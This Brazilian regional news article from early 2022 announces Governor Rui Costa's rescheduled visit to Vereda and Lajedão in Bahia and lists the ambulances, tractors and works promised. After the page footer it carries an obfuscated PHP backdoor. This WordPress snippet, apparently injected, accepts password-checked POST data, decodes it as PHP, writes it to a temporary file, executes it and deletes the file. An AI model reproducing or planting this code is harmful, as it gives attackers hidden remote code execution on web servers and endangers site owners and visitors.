• SEJA BEM-VINDO

Governador Rui Costa visitará Vereda e Lajedão nesta terça-feira (04)

Publicado em: 03/01/2022 Atualizado:: janeiro 3, 2022

A assessoria do governador confirmou para a próxima terça-feira, 04 de janeiro, a visita de Rui Costa às cidades de Vereda e Lajedão, no extremo sul da Bahia.

Esta visita que o governador fará as cidades de Lajedão e Vereda estava programada para o dia 20 de dezembro, mas devido ao mau tempo e as fortes chuvas que caíram na região, o avião que traria Rui Costa não pode pousar e a vista foi adiada.

 

Na visita de dezembro, o governador iria fazer entrega de várias ambulâncias, tratores e máquinas o que foi feito pelo secretário Gerônimo Monteiro e Manrick Teixeira, prefeito de Vereda e presidente do Consórcio Constuir aos prefeitos contemplados.

 

Foram entregues, 12 ambulâncias tipo Van para as cidades de Alcobaça, Caravelas, Ibirapuã, Itamaraju, Itanhém, Jucuruçu, Medeiros Neto, Mucuri, Nova Viçosa, Prado, Teixeira de Freitas e Vereda. Dez tratores agrícolas com implementos para Alcobaça, Caravelas, Ibirapuã, Itanhém, Jucuruçu, Medeiros Neto, Mucuri, Prado e Vereda.

O Consórcio Público Intermunicipal de Infraestrutura do Extremo Sul da Bahia (Construir) recebeu quatro equipamentos: um trator agrícola de pneus, uma roçadeira hidráulica, um caminhão pipa e uma motoniveladora para ajudar na recuperação das estradas vicinais destruídas pelas chuvas.

 

 

 

Em Vereda seria assinada ordem de serviço para implantação do Sistema de Abastecimento de Água, além de autorizar novas obras nas áreas de educação e urbanização. Na ocasião, Rui iria autorizar a revitalização e modernização do Colégio Estadual Odílio Alves Neto, com implantação de refeitório, auditório, vestiário, reforma e cobertura da quadra poliesportiva e assinatura do convênio com o município para pavimentação em piso intertravado em diversas ruas do bairro São Pedro, na sede, distrito de São José de Vereda e povoado de Sulzinho e a reforma do mercado municipal.

 

A chegada em Vereda está prevista para as 9h, logo após a solenidade, o governador e comitiva seguirá para Lajedão.

 

 

A chegada a Lajedão está prevista para as 14 horas. Segundo o prefeito Tonzinho, o governador vai assinar a autorização para modernização do Colégio Estadual Professora Neide Soares Borges, com implantação de refeitório e quadra poliesportiva coberta. A reforma do mercado municipal e a iluminação do estádio estão entre as obras que serão autorizadas pelo governador. Lajedão também será contemplado com um aparelho de Raio X para a Unidade de Saúde Dona Diza.

 

Fonte: Bahiaextremosul


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}